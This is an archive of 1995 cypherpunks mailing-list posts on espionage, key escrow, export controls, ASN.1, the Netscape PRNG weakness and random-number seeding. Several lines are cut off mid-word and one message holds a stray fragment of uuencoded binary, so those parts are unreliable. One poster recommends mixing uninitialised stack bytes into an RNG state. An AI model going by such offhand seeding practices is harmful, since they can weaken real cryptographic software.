news magazine (Focus 34/1995, p. 178-181) I read an >article about industrial espionage. It is said that the secret >services have lost their main task when the east/west cold war had >gone. Their new task is the industrial espionage. The russian, french, >and american services were referenced in the article. The cold war isn't so decisive. Much of espionage has always been industrial. I is an essential component of political espionage in any case. Millitary espiong may get the headlines but the bulk of the work is trawling through trade stats and various open networks in embassies etc. In any case with the breakup of the USSR there are now more states to watch and because they are unstable more need to watch them. Phill From tcmay at got.net Wed Sep 20 16:55:13 1995 From: tcmay at got.net (Tcmay@got.net) Date: Wed, 20 Sep 95 16:55:13 PDT Subject: ECONOMIC ESPIONAGE? Message-ID: <9509201546345376@ci.diamond-bar.ca.us> Date: Wed, 30 Aug 1995 22:22:13 -0700 To: cypherpunks at toad.com From: tcmay at got.net (Timothy C. May) Subject: Economic Espionage? At 1:25 AM 8/31/95, Tatu Ylonen wrote: >> >It was said that Pres. Clinton had given a speech while >> >visiting the CIA HQ in Langley/Virginia. He allegedly >> >said in this speech that obtaining industrial >> >informations has the highest priority and this were the >> >new task for the spies. > >There was a fairly large article about this in Helsingin Sanomat, the >largest newspaper in Finland, some weeks ago. It was quoted as being >originally from the New York Times. (I have the clip saved at home >and can check the date if anyone is interested.) > >I do find it rather shocking that the most powerful country in the >world sets industrial espionage as the primary task of their >intelligence services. What confirmation can you give us for this statement? I'd like to see the actual comments, not just second-hand reports. The issue of economic surveillance has come up several times, and I know of no formal policy to institute such a program. The U.S., with generally multiple competitors in each market, would have a hard time figuring out who to tell "foreign secrets" to. Would Ford be told? Or just General Motors? What about companies with operations in multiple countries? Former DIRNSA (Director of the NSA) William Odom has said repeatedly that economic espionage cannot plausibly be a central task of the NSA. Before anyone accuses me of being an apologist for the NSA (usually these claims arrive anonymously), I've been looking for evidence of an economic intelligence role or mission of the U.S. intelligence agencies for more than 7 years. Let's see some evidence. --Tim May ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From piete.brooks at cl.cam.ac.uk Wed Sep 20 16:55:46 1995 From: piete.brooks at cl.cam.ac.uk (Piete.brooks@cl.cam.ac.uk) Date: Wed, 20 Sep 95 16:55:46 PDT Subject: Article in the Guardian (UK) about Hal2 not bad .... Message-ID: <9509201546385387@ci.diamond-bar.ca.us> Date: Thu, 31 Aug 1995 08:00:07 +0100 From: Piete Brooks An article by Azeem Azhar on page three of today's "The Guardian Online" (he tells me it is available only in paper form !) is fairly positive. He puts over the main point: "since US government regulations prevent the export of software that uses stronger cryptographic techniques". From hallam at w3.org Wed Sep 20 17:16:30 1995 From: hallam at w3.org (Hallam@w3.org) Date: Wed, 20 Sep 95 17:16:30 PDT Subject: Whitehouse "dissident" and net monitoring Message-ID: <9509201551016603@ci.diamond-bar.ca.us> Date: Wed, 13 Sep 95 11:18:14 -0400 From: hallam at w3.org >> >(4) Is the April 9 statement by David Lytel of the White House Office of >> > Science and Technology to Amy Bauer of Copley News Service that the >> > administration does not monitor anti-Clinton activity on the web still >> > operative? >Probably they do and they really should. If I was Mr. Clinton (which >I luckily am not) I would want my adjudats to prepare a report for >me each morning summing up all the possible comments round >subject Clinton and The USA from NET: That would be very precisious >source of feedback to finetune your acts. And that information >is real time. Nope they don't the Democratic party aides do that type of work from Democrat HQ. The President gets a once a week summary of all the mail he gets including the email. I think they also provide a daily press digest. By monitoring Lytel was probably thinking about installing net sniffers etc or obtaining the data from the FBI or whoever. I am certain he didn't mean to say that he does not surf the net ever and does not occasionaly visit opposition sites. The term monitor implies an organised search and continuous checking proceedure the number of hits cited sounds more like somone passed round the URL of a kook site inside the office. Phill From jis at mit.edu Wed Sep 20 17:16:36 1995 From: jis at mit.edu (Jis@mit.edu) Date: Wed, 20 Sep 95 17:16:36 PDT Subject: ASN.1 AND KERBEROS VERSION 5 Message-ID: <9509201547165561@ci.diamond-bar.ca.us> Date: Sat, 2 Sep 1995 13:55:38 -0400 To: cypherpunks at toad.com From: jis at mit.edu (Jeffrey I. Schiller) Subject: ASN.1 and Kerberos version 5 -----BEGIN PGP SIGNED MESSAGE----- Perry E. Metzger writes: >I've heard people associated with the decision to use ASN.1 in >Kerberos V say it was a mistake. Frankly, I think ASN.1 is a blight >which should be exterminated from the planet. I'll say it. I was the person who pushed for the use of ASN.1 in Kerberos version 5. I had this disease at the time that made me think that ASN.1 was a good idea. I got better, unfortunately we have been living with the results of my braino for quite some time now... poor Ted. However, the problem with ASN.1 isn't its waste of space (which actually isn't that bad for a mechanism for encoding arbitrary objects). The problem is that it is the product of a standards making process that didn't (and doesn't) value interoperability. Adherence to the ISO specifications does not guarantee interoperation. Instead regional "workshops" negotiate aspects of implementations to obtain interoperation. What does this mean for ASN.1? It means that the definition of ASN.1 is a bit abstract (as its name implies). Problems result when two organizations (say MIT and OSF!) attempt to implement from the specification in ASN.1 but use different ASN.1 compilers and things then don't work. Arguments then ensue about whose compiler (or manually written parsing code) is "correct" in terms of doing the right thing with ASN.1. This is particularly so when using DER (for Distinquished Encoding Rules) which is itself an after-thought added to ASN.1 later in the process. It is required in order to verify digital signatures (which have to be computed on the "encoded" form of an object because there is no good way to calculate a signature on an "abstract" object). If the Kerberos specification said: "pub this byte here and that one there" none of these arguments and problems would happen. -Jeff -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMEiaf8UtR20Nv5BtAQFzNAP/Q/LuIMbxAPAp64Kn2PSPd600TYlRAUJh QbsuL/iRhGXWrxSjsFzkcr6e3sIpSFggxglFU38TJT/DG2AD8MOid3Uj4pRJVbyo z7Au0Vp1NiotmRBHq2udItzJ7LLPM0j38FHQenqPs9mkX2Cq5kVgGUBO94HabEuE S9XPCgV8E1Q= =kTyw -----END PGP SIGNATURE----- From alano at teleport.com Wed Sep 20 17:16:55 1995 From: alano at teleport.com (Alano@teleport.com) Date: Wed, 20 Sep 95 17:16:55 PDT Subject: CRYPTOGRAPHY ELIMINATES LAWYERS? Message-ID: <9509201549496270@ci.diamond-bar.ca.us> Date: Sat, 09 Sep 1995 12:41:12 -0700 To: cypherpunks at toad.com From: Alan Olsen Subject: Re: cryptography eliminates lawyers? At 02:44 PM 9/8/95 -0400, you wrote: >We wish! We really wish! "Fill that lawyer with a few more slugs of encryption!" The argument that encryption will free us from all the legal ills of the world is pretty specious. If anything it will make more work for lawyers as the non-clue-endowed portion of the world tries to come to terms with the new technology. They will make rules and subsets of rules and exeptions to rules and variations to interpetations of rules that will make the current set look like the rules to "chutes and ladders". Part of the job of the lawyer class is to guarentee the existance of work for other lawyers (as well as themselves). It does not depend on what the medium of exchange is. Lawyers and government forces will try and figure out some way to try and extract it from you. The government is trying very hard to keep any scrap of power from creeping away from them. You can bet that they will try every thing they can think of, rational and irrational, to regulate and control the wilds of cyberspace. They will pump up every imaginary boogieman to help them get the public to swallow what they are fed. By the time they figure out they have been had, it will be too late. Cypherpunks must be the syrup of ipecac to the governments dose of poison to the body politic! (I need to start drinking more coffee in the morning. I cannot believe I wrote that...) Unfortunatly the public does not thrive on logic. They had been trained to react emotionally to things and not react logically. I am not certain what can be used to get them to realize why they need encryption. Dispelling the bogeymen is none need. The other thing is that the tools need to be made as simple as possible. The current tools for use require a fair bit of technical understanding. Until they have an integrated front-end that makes it about as easy to use as America On-Line, encryption will not gain widespread usage. This is the type of code that needs to be written. Making integrated tools like newsreaders and mail programs that support strong encryption directly is what is needed for widespread use. (As well as being usable programs in and of themselves. Many of the programs for news and mail are crap.) Making cryptography a "cool and fun thing to use" will help dispell many of the myths and may help to defuse the government created bogey men. (Of course they will claim that it aids "criminals and terrorists", but to them EVERYONE is a criminal and a terrorist.) | Visualize whirled keys | alano at teleport.com | |"It's only half a keyserver. I had to split the | Disclaimer: | |other half with the government man." - Black Art | Ignore the man | | -- PGP 2.6.2 key available on request -- | behind the keyboard.| | http://www.teleport.com/~alano | | From anonymous at freezone.remailer Wed Sep 20 17:17:24 1995 From: anonymous at freezone.remailer (Anonymous@freezone.remailer) Date: Wed, 20 Sep 95 17:17:24 PDT Subject: SMART CARDS, CREDIT CARDS, PAYMENT SYSTEMS Message-ID: <9509201551476821@ci.diamond-bar.ca.us> Date: Fri, 15 Sep 1995 09:14:45 -0400 To: cypherpunks at toad.com From: anonymous at freezone.remailer Subject: Smart Cards, Credit cards, Payment systems URL: http://www.dice.ucl.ac.be/~dhem/card.html Smart Cards, Credit cards, Payment systems. This page is under development. _________________________________________________________________ Card Europe DigiCash MasterCard Futur 1 , 2 Virtual Open Network Environment (V-ONE) MONDEX AT&T and GiroVend agree to promote smart card applications AT&T Universal Card Services ATT buyinfo ibd.ar.com/lists/comp/cypherpunks Discussions, mailing lists, and sites , Payment mechanisms designed for the Internet News items on information technology (Not especially Smart Cards) Electronic Cash, Tokens and Payments in the National Information Infrastructure Forum On Risks To The Public In Computers And Related Systems (ACM) The Risks Digest Volume 4: Issue 32 The Risks Digest Volume 15 The Risks Digest Volume 16 SMI Finger Check -- Fingerprint Verifier DIGITAL SRC Research Reports Authentication and Delegation with Smart-cards Innovonics QC consultancy University of Wollongong: Centre for Computer Security Research SecureWare, Inc. OKI Telecom (Smart) Cards Museum (big) Buying Prepaid Calling Card S. Brands Cyberbank '95 Electronic benefits transfer (EBT) in US NCSA/DTIC Security Seminar Power Broker First Union Corp. will offer stored-payment ''smart cards'' Network Payment Mechanisms and Digital Cash PCMCIA Cards THE PREPAID & RECHARGEABLE PHONE CARD Cardservice International _________________________________________________________________ UCL crypto group _________________________________________________________________ Last update: 11 September 1995. Send any comment to: Dhem at dice.ucl.ac.be (J.-F. Dhem) From gjeffers at socketis.net Wed Sep 20 17:17:36 1995 From: gjeffers at socketis.net (Gjeffers@socketis.net) Date: Wed, 20 Sep 95 17:17:36 PDT Subject: PHIL ZIMMERMANN/AMNESTY INTERNATIONAL? Message-ID: <9509201546525457@ci.diamond-bar.ca.us> Date: Fri, 01 Sep 1995 02:16:20 -0500 To: cypherpunks at toad.com From: gjeffers at socketis.net (Gary Jeffers) Subject: Phil Zimmermann/Amnesty International? Phil Zimmermann/Amnesty International? I was wondering if the Zimmermann case would be a proper concern of Amnesty International. Phil is obviously a political dissident. His persecution is obviously political. If Phil got support from Amnesty Int'l, then his persecution could be a big embarrassment to the Federal gov't. He has a lot of supporters and taking up his cause could be a big promotional for Amnesty International. The Feds might feel forced to drop the matter early. Any ideas? Gary Jeffers From mr.xxx at ce.flashnet.it Wed Sep 20 17:17:40 1995 From: mr.xxx at ce.flashnet.it (Mr.xxx@ce.flashnet.it) Date: Wed, 20 Sep 95 17:17:40 PDT Subject: No Subject Message-ID: <9509201546595494@ci.diamond-bar.ca.us> Date: Fri, 1 Sep 1995 21:00:32 +0200 To: cypherpunks at toad.com From: Pasquale Piombino Hi all, I am searching PGP software. Does anyone know where I can download it? Thanks for answers. -+-+------------------->->--------------------------------:-Q------------ =B0 Pasquale Piombino | | Via Colombo, 35 Email: mr.xxx at ce.flashnet.it =B0 =B0 I-81100 CASERTA Phone - Fax: 0039 823 329152 | | ITALY =B0 +-+-------------8-)---------------------:-))-----------------:-o--------- From joelm at eskimo.com Wed Sep 20 17:17:59 1995 From: joelm at eskimo.com (Joelm@eskimo.com) Date: Wed, 20 Sep 95 17:17:59 PDT Subject: NIST ESCROW PAPERS - NOW WEB AVAILABLE Message-ID: <9509201549226130@ci.diamond-bar.ca.us> Date: Thu, 07 Sep 1995 21:28:59 -0700 To: cypherpunks at toad.com From: Joel McNamara Subject: NIST Escrow Papers - Now Web Available Several of the scanned hand-outs (courtesy of John Young) for the NIST Septembe http://www.eskimo.com/~joelm Papers include: The outlines of meeting topics of Raymond Kammer of NIST and Michael Nelson of Discussion Paper No. 4, "Example Potential Solutions for the Draft Export Crite The Business Software Alliance's dissenting blast at the government's key escro Trusted Informations Systems's "Thoughts on the NIST Escrow Issues Meeting Disc TECSEC Incorporated's "Private Escrow Key Management: A Method and its Issues." Dorothy Denning's "Comments on Draft Criteria for Software Key Escrow Exportabi From hallam at w3.org Wed Sep 20 17:18:04 1995 From: hallam at w3.org (Hallam@w3.org) Date: Wed, 20 Sep 95 17:18:04 PDT Subject: Is the book Network Security any good? Message-ID: <9509201546335370@ci.diamond-bar.ca.us> Date: Wed, 30 Aug 95 22:53:49 -0400 From: hallam at w3.org >Has anyone read the book "Network Security Private Communication in a >PUBLIC World" yet? It's by Charlie Kaufman, Radia Perlman, and Mike >Speciner, and has a copyright date of this year. Its pretty good on security and structure of protocols. Makes a good companion the Schneier book. I use it frequently. It does have some very irritating assertions concerning ASN.1 however, specifically concerning its use in Kerberos. I consider Kerberos's use of ASN.1 to be far superior than the alternative suggested which is pure lossage. Lambasting the use of ASN.1 is fair game but arguments over wasted bytes miss t point of ASN.1 and the BER encoding entirely. It would make a usefull course book. Phill From daw at CS.Berkeley.EDU Wed Sep 20 17:18:06 1995 From: daw at CS.Berkeley.EDU (David_A Wagner) Date: Wed, 20 Sep 95 17:18:06 PDT Subject: NYT on Netscape Crack Message-ID: <199509202353.QAA20322@guaymas.CS.Berkeley.EDU> In article <9509201034.AA10521 at prakinf.tu-ilmenau.de> you write: > Is it a good idea to use different (unrelated!) seeded PRNG's for the > challenge data (which can be seen by sniffing) and the masterkey (which > should never leave out of client's memory? No. If the master key PRNG is poorly seeded, this is still exploitable: for instance, there is a lot of redundancy in most plaintext, and this can be used to check each candidate key value. Just use a cryptographically secure PRNG seeded with enough entropy. From andrew.spring at ping.be Wed Sep 20 17:18:23 1995 From: andrew.spring at ping.be (Andrew.spring@ping.be) Date: Wed, 20 Sep 95 17:18:23 PDT Subject: BIZDOS CITIZENSHIP? Message-ID: <9509201549586314@ci.diamond-bar.ca.us> Date: Sun, 10 Sep 1995 22:11:28 +0100 To: cypherpunks at toad.com From: Andrew.Spring at ping.be (Andrew Spring) Subject: Re: Bizdos citizenship? -----BEGIN PGP SIGNED MESSAGE----- >In correspondence with someone outside the US regarding ITAR regulations, the remark was made that Jim Bizdos was Greek and not a U.S. citizen. Is this statement in the same class as an Elvis sighting? Or if it is true, what impact would ITAR have on foreign nationals working for a US company involved with export restricted crypto? > >Please don't get carried away and turn this into a Net rumor. I'm just curious if anyone on the list can confirm or deny the citizenship comment. Jim Bidzos is a US Permanent Resident Alien and Greek citizen. He has a Green Card. It doesn't have any ITAR impact, since the ITAR term 'Foreign Person' doesn't include Green Carded Resident Aliens. It probably wouldn't have any impact anyway, since he's a business weenie, and not a software weenie. Now, if he had a _programmer_ that wasn't a US Citizen, that would be a-whole-nother kettle of fish. He's previously stated that he would become a US Citizen, if it were not for the fact that Greece would require him to give up his Greek (and hence his EC) citizenship. See Simson Garfinkle's book on PGP for more details. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMFMZFI4k1+54BopBAQGK7gP+Oq+FjqjCeQziC16Ryq64i1tXMAhV/jaX 86TBumss/GPpaVfLGtDS3FZARK9eTo4gVPTfABtvIa/u6QzZGL9zCT5z5nWT5QJ4 Koj5jnGsnNpXx3YGa1bJfZOI4ctkRovPWpyPa4jWOEooJz5UbvCCwGW/YoYMlvCs sQ//Qs7uDPs= =ARLj -----END PGP SIGNATURE----- From jim at rand.org Wed Sep 20 17:18:24 1995 From: jim at rand.org (Jim@rand.org) Date: Wed, 20 Sep 95 17:18:24 PDT Subject: Clipper: the definitive meme Message-ID: <9509201550146386@ci.diamond-bar.ca.us> Date: Mon, 11 Sep 95 08:26:42 PDT From: Jim Gillogly T-shirt!! T-shirt!! Jim Gillogly Trewesday, 20 Halimath S.R. 1995, 15:26 ------- Forwarded Message From: wtshaw at aol.com (WTShaw) Newsgroups: talk.politics.crypto Subject: Re: Impressions of the NIST meeting Date: 11 Sep 1995 04:50:27 -0400 In the world of Jet-Age crypto, the government offers up a biplane, and seek to reserve the second seat for themselves. ------- End of Forwarded Message From carolann at censored.org Wed Sep 20 17:20:51 1995 From: carolann at censored.org (Censored Girls Anonymous) Date: Wed, 20 Sep 95 17:20:51 PDT Subject: www.commentary.unabomber Message-ID: <199509210020.RAA15682@usr5.primenet.com> -----BEGIN PGP SIGNED MESSAGE----- Go FrogFarm Go! From: Damaged Justice Subject: Re: www.commentary.unabomber To: carolann at censored.org Date: Wed, 20 Sep 1995 20:03:45 -0400 (EDT) X-Angst-Level: Fair to Middlin' X-Authentication-Vegetable: Aardvark X-NSA-Food: narcotics anarchy bosnia encryption assassinate X-Thrash-Confirmation: Ahh! Hippy on a stick! Organization: Somewhere just far enough outside of your jurisdiction Reply-To: frogfarm at yakko.cs.wmich.edu Yes, it's a complete version. I've also started a rudimentary rebuttal/ commentary page at http://yakko.cs.wmich.edu/~frogfarm/unabuttal.html - -- frogfarm at yakko.cs.wmich.edu (Damaged Justice) is officially declared Unmutual s..O).... The smurf wields a hypodermic! -- More -- I like women who @.../.".. You destroy the smurf! -- More -- are *strong*, in .$*...].. You feel self-righteous! every sense of the word. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMGCvXIrpjEWs1wBlAQFHWAP9Fnf7patTds/KSr6EssfDgZvZKSQiTSqT ddK52W1cbAI+oJT46v0rX2Z7gQeibjHu64jCpQLj7df62p11RD7ElseD9EOJLjUX wUOy5+ap9+dbdr1FViWgwG+B6qExmrduZTsJ3jHz8Fq6cxd8e5iRW+R61wT4Ph1W wZtDiMrUpIE= =UQy3 -----END PGP SIGNATURE----- -- Member Internet Society - Certified BETSI Programmer - Webmistress *********************************************************************** Carol Anne Braddock (cab8) carolann at censored.org 206.42.112.96 My Homepage The Cyberdoc *********************************************************************** ------------------ PGP.ZIP Part [017/713] ------------------- M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M MF=O0H+*%(-S%&>S%+FS& http://dcs.ex.ac.uk/~aba/export/ From anon-remailer at utopia.hacktic.nl Wed Sep 20 17:27:34 1995 From: anon-remailer at utopia.hacktic.nl (Anon-remailer@utopia.hacktic.nl) Date: Wed, 20 Sep 95 17:27:34 PDT Subject: NETSCAPE TO PATCH SHAREWARE VERSION Message-ID: <9509201550426518@ci.diamond-bar.ca.us> Date: Tue, 12 Sep 1995 23:00:18 +0200 To: cypherpunks at toad.com Subject: Re: Netscape to patch shareware version From: anon-remailer at utopia.hacktic.nl (Anonymous) Organization: Hack-Tic International, Inc. >| Netscape said it received word last week that the State Department had >| cleared that version for release on the Net, but only within the U.S., >| owing to current export laws banning the export of encryption schemes >| stronger than 40 bits. THe company could provide no details by press >| time on how it would ensure that the 128-bit version wouldn't leak beyond >| U.S. borders. > >Ok, any bet on how long it will take? It's already been exported. Evidently, one of those who bought the commercial I note the site removed it, however, probably because Netscape Comm. Inc. reque From dsc at swcp.com Wed Sep 20 17:27:35 1995 From: dsc at swcp.com (Dsc@swcp.com) Date: Wed, 20 Sep 95 17:27:35 PDT Subject: (NOISE) X-FILES ANARCHIST Message-ID: <9509201552126919@ci.diamond-bar.ca.us> Date: Sat, 16 Sep 1995 09:56:59 -0600 To: cypherpunks at toad.com From: dsc at swcp.com (Dar Scott) Subject: (Noise) X-Files anarchist I hardly watch TV ...blah, blah..., but I saw X-files last night. A very minor character was a cryptohacker who--to his surprise--brute-forced a military key for some files. He was described as an anarchist. To _my_ surprise, this anarchist was not associated with violence or lunatic ravings. He was shown as reading a book entitled something like Survey of Modern Conspiracy Theories. I see this as an improvement in the stereotype of computer-associated anarchists. And this I see as a good thing, since I think there is a lot that could be learned from anarchists. I think the character was killed, but I may have missed something. Dar =========================================================== Dar Scott Home phone: +1 505 299 9497 Dar Scott Consulting Voice: +1 505 299 5790 8637 Horacio Place NE Email: darscott at aol.com Albuquerque, NM 87111 dsc at swcp.com Fax: +1 505 898 6525 http://www.swcp.com/~correspo/DSC/DarScott.html =========================================================== From terrell at sam.neosoft.com Wed Sep 20 17:27:56 1995 From: terrell at sam.neosoft.com (Terrell@sam.neosoft.com) Date: Wed, 20 Sep 95 17:27:56 PDT Subject: GAK Message-ID: <9509201549166094@ci.diamond-bar.ca.us> Date: Thu, 07 Sep 1995 18:42:06 -0500 To: cypherpunks at toad.com From: terrell at sam.neosoft.com (Buford Terrell) Subject: Re: GAK >Date: Sun, 3 Sep 1995 21:25:26 -0400 (EDT) >From: Brian Davis >Subject: Re: GAK >On Fri, 1 Sep 1995, Timothy C. May wrote: > >> At 10:56 PM 9/1/95, Buford Terrell wrote: >> >> >If you've ever watched Not_at_all_Funny Home Videos or any of the >> >American Urinal school of tabloid television, you soon start feeling >> >that the real threat to privacy is not the guvmint, but all of >> >the yoyos with their little cam corders running around pointing them >> >at people. >> > >> >Security cameras in ATMS and at airline ticket counters do more >> >to threaten you privacy than do FIBBIE wiretaps, and PGP won't >> >protect you from them. (and usually neither will the courts). >> >> I absolutely agree with this, though this doesn't mean I'll stop worrying >> about the government's plans for key escrow (GAK), about limits on key >> lengths, or about other efforts to thwart strong security. > >I, of course, know of the "dislike" of GAK here. I am curious to know, >however, if the "dislike" is because government would have access under >any circumstances or if the primary worry is that government will cheat >and get access when most would agree that they shouldn't (either by the >judge "cheating" or a TLA stealing it). > >In other words ... if it took agreement by a review board composed of >non-LEA members of this list, would the escrow be acceptable?? > >EBD > In my case, it's simply a matter of principle: the government has no right to know what I'm saying. Search warrants may allow them to get to "things" that I have, but the First and Fifth amendments make words sacred. If the government can eavesdrop on my conversation, then my speech is no longer free. A review board consisting of cypherpunks has no more right to listen to my private conversations than does the FBI, so I would not agree to that proposal either. --buford From pfarrell at netcom.com Wed Sep 20 17:28:40 1995 From: pfarrell at netcom.com (Pat Farrell) Date: Wed, 20 Sep 95 17:28:40 PDT Subject: Selling our spin. was: Cypherpunks Press release Message-ID: <73484.pfarrell@netcom.com> Kevin L Prigge writes: > Does anyone know exactly how the press contact thing works? My impression > is that a reporter/journalist stumbles on to someone who knows something > about a particular area, and is willing to be interviewed. Then the next > time a story comes along that deals even slightly with that subject, the > reporter will tend to contact that person. I think the "exact" process varies with the journalist. But you have it generally correct. The press runs on reputations. When a writer gets a story, they look for "reliable sources" to contact. Reputations are based on a lot of things, including knowledge, speaking ability, looks and the ability to emit a sound-bite that is interesting. it is a strange process. I mean, I even got on CNN during the Morris worm. Tim is right, there is no "we" here. We can't have an official spokesperson, we don't agree on much. But we can work from the ground up. There are a number of serious cryptographers on the list, or at least friendly to the list when the S/N ratio makes sense. With a little work, we should be able to find a fairly long list of media contacts. We can even make it media friendly. >From people I've personally seen recently, we could have Doug Humphrey of Digex (nice to have a security-related company President) Bob Stratton of UU.Net (corporate security wiz) Carl Ellison of TIS (usually on c'punks light and at all DCcp meetings) probably others at TIS such as Ken Mendelsen or Steve Walker For the political side, the folks at EFF, CDT, EIPC, etc. And there are others that could be good contacts, such as William H Murray of Delloite and Touche, Matt Blaze of [Bellcore|BellLabs] It might take a while to get permission for referal, but I expect that most security consultants would consider being quoted in mainstream press to be good advertizing. If we make it easy, anyone would be willing to take advantage of the resource. We should also inclue a representative sample of folks who disagree with us. Any real list should include Dorothy Denning and other supporters. We can simply stack the deck. We can make sure that the mainline journalists know where to look, and make sure that CDT, EFF, ACLU, and EPIC have references that are ready when they are asked for referals. Assuming my web server recovers from the mention in comp.risks, I'm more than willing to accept suggestions and have a "security spokes-folks" page. Pat Pat Farrell Grad Student http://www.isse.gmu.edu/students/pfarrell Info. Systems & Software Engineering, George Mason University, Fairfax, VA PGP key available on homepage #include From jsw at netscape.com Wed Sep 20 17:49:02 1995 From: jsw at netscape.com (Jeff Weinstein) Date: Wed, 20 Sep 95 17:49:02 PDT Subject: netscape's response In-Reply-To: <199509210016.RAA20367@guaymas.CS.Berkeley.EDU> Message-ID: <9509201745.ZM206@tofuhut> On Sep 20, 5:16pm, David_A Wagner wrote: > Subject: Re: netscape's response > In article <9509200139.ZM206 at tofuhut> you write: > > On Sep 20, 12:29am, Christian Wettergren wrote: > > > One wild idea that I just got was to have servers and clients exchange > > > random numbers (not seeds of course), in a kind of chaining way. Since > > > most viewers connect to a number of servers, and all servers are > > > connected to by many clients, they would mix "randomness sources" with > > > each other, making it impossible to observe the local environment > > > only. And the random values would of course be encrypted under the > > > session key, making it impossible to "watch the wire". > > > > Wow, this is a great idea!! > > Are you quite sure this is a good idea? > > I'd be very scared of it. In particular, it opens up the chance for > adversaries to feed you specially chosen numbers to pollute your seeds. What I should have said is that its a very interesting idea. Given current perceptions of netscape, I should have made clear that I wouldn't do something like this without getting a lot more discussion and review of possible dangers and how to avoid them. I certainly can't fault anyone for wondering if we would just implement this without thinking it through, given recent events. --Jeff -- Jeff Weinstein - Electronic Munitions Specialist Netscape Communication Corporation jsw at netscape.com - http://home.netscape.com/people/jsw Any opinions expressed above are mine. From tcmay at got.net Wed Sep 20 17:54:47 1995 From: tcmay at got.net (Tcmay@got.net) Date: Wed, 20 Sep 95 17:54:47 PDT Subject: AN OPPORTUNITY NOT TO BE MISSED Message-ID: <9509201551146661@ci.diamond-bar.ca.us> Date: Wed, 13 Sep 1995 19:25:24 -0700 To: cypherpunks at toad.com From: tcmay at got.net (Timothy C. May) Subject: Re: An opportunity not to be missed At 1:57 AM 9/14/95, Bill Stewart wrote: >Is Wavy Gravy running his "Nobody for President" campaign again this time? >After all, Nobody's going to balance the budget, and Nobody's going to >get the government out of your bedroom, and on the internet, Nobody can tell >if you're a dog or not :-) Or to update it for today: "Nobody at remailer.org for President." --Tim ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From gnu at toad.com Wed Sep 20 20:23:19 1995 From: gnu at toad.com (John Gilmore) Date: Wed, 20 Sep 95 20:23:19 PDT Subject: Spam of c'punks list: cleaning it up now. Message-ID: <9509210323.AA03882@toad.com> Somebody, apparently at ci.diamond-bar.ca.us, has been feeding the last month's worth of Cypherpunks postings back to the Cypherpunks list. You probably saw a few of them. They are still coming in to toad.com. When I got home this afternoon, the load average had hit 150 and most of them were copies of sendmail. This prevented most of the messages from getting out to you, happily. I've cleaned up the ones I found in the queues, and I'll start working next on getting the *valid* cypherpunks messages flowing again... John Gilmore From eay at mincom.oz.au Wed Sep 20 20:38:49 1995 From: eay at mincom.oz.au (Eric Young) Date: Wed, 20 Sep 95 20:38:49 PDT Subject: Random Number State In-Reply-To: <9509202150.AA08164@toad.com> Message-ID: Some some ramblings on the RNG seeding issue, comments welcome. I'm sort of in the position of Netscape in that I have an SSL library that needs good random numbers for both RSA key generation (soon DH) and SSL sessions. While most of the discussions have been how to generate random data, one solution I will probably follow is that when any 'semi-random' data is generated, make sure to save this for seed data the next time the application starts. I have faith in the RNG capabilites of my RNG (based on MD5) and my RAND_seed() routine only 'adds' to the RNG state (about 1k's worth is kept). I can continue to 'mix' the RNG state at any point in time. My RND_seed() xors into the existing state, it does not overwrite. Because my SSL/encryption library contains 'everything', I have the ability to put calls to my RNG_seed() routine in places like when I decrypt a private key. I can pass both the password (if the key was encrypted) and the private key into the RNG state (making sure any data that goes into the RNG state can not be determinied if a 'core' file is generated). I will probably also put the time() into the RNG state whenever an SSL_connect or SSL_accept is made (I think I do already). I may also put in select data that has been read from the remote host While most of this data can be determined by watching network activity, if it is just a delta to the initial random state it is somewhat more useful. The first time use 'x' runs the application they are made to 'generate' some reasonable random data. For all subsequent executions of the program, any more semi (psuedo?) random data generated can be mixed in with the initial random data. The profile of the usage of the application would end up determining the random data to use. I feel it is a bit much to try to generate good random data every time an application is run. I believe this is the type of aproach PGP uses (I have not looked at the code). eric PS I also do some 'evil' things in that I load 'garbage' bytes from the stack into my RNG state whenever the RNG is called. It may not be random, but I bet it is hard to determine from the outside the running program :-) It can only help :-). -- Eric Young | Signature removed since it was generating AARNet: eay at mincom.oz.au | more followups than the message contents :-) From tcmay at got.net Wed Sep 20 20:45:17 1995 From: tcmay at got.net (Timothy C. May) Date: Wed, 20 Sep 95 20:45:17 PDT Subject: Project: a standard cell random number generator Message-ID: At 9:50 PM 9/20/95, John Gilmore wrote: >Software-generated random numbers are likely to be of poor quality. >There just isn't that much true randomness visible to computers. >Several ways to build good hardware random number generators are >known. But before hardware random number generators can be >incorporated into common desktop computers, someone will have to put >them into a small fraction of a chip. Essentially, to have good market penetration, this means building a small hardware random number generator into the Pentium, and a few other popular processors. Building it into a separate chip is ineffective, as chip counts are going down on motherboards. (Some may quibble, but clearly about 60-80% of the market is now x86-based, with motherboards supplied by a limited number of companies, and with "chipsets" like the Triton.) What would it take to convince Intel, then, to devote resources to put a HRNG module on, say, future versions of the Pentium, Pentium Pro (P6), etc.? A lot, I'd say. First, Intel will ask what products would gain from _some_ hardware platforms having HRNG when the majority will not. (This is important, because it means that as long as there are vast numbers of 486-, Pentium-, SPARC-, MIPS-, 68K-, and PPC-based systems out there that DON'T have hardware random number generators, then Netscape and other suppliers of software CANNOT COUNT ON THE HRNG. This is an important point: a hardware RNG standard will take many years to percolate into the installed base and reach a level of penetration where even 30% of all machines are equipped with HRNG modules. In the meantime, Netscape and everyone else has to come up with solutions which fit the existing and nearterm-available machines. Second, how much extra will customers pay? Even if the area of the HRNG is less than 1% of the total, design resources are consumed and potential reliability and liablility issues arise. (Liability is problematic precisely because the HRNG is nondeterministic, and some chips are likely to be "more random" (which is "good") than others which are "less random" (which is "bad"). Imagine a customer having a chip which he finds out produces very little entropy, for technical/manufacturing reasons. >You probably can't build a hardware random number generator out of >existing "gate array" gates or "standard cell" cells, because all the >existing gates and cells are designed to behave completely >predictably! It will take 